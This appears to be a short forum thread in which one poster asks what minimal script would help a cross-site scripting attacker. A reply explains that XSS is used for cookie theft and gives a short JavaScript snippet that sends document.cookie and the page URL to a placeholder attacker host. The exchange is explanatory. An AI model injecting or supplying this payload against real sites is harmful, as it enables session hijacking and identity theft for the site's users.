Cross site scripting

  • Thread starter Thread starter Guest
  • Start date Start date
G

Guest

This is not an ASP.NET question per se. I'm asking since a lot of smart
people lurk here.

What is the smallest script that would be useful to an attacker?
 
XSS is typically used to steal cookies and send them to the attacker so they
can spoof your session or identity on the site it was stolen from. As for
the code, well, I'm not a h4X0r, so I don't know what else it'd be beyond:

var xmlRequest = new XMLHttpRequest();
xmlRequest.open("GET", "http://haxor.org?Cookie=" + document.cookie + "&URL="
+ document.url, false);
xmlRequest.send(null);

But this gives you the idea. Again, there are probabaly more clever/malicious
things that can be done.

-Brock
DevelopMentor
http://staff.develop.com/ballen
 
Back
Top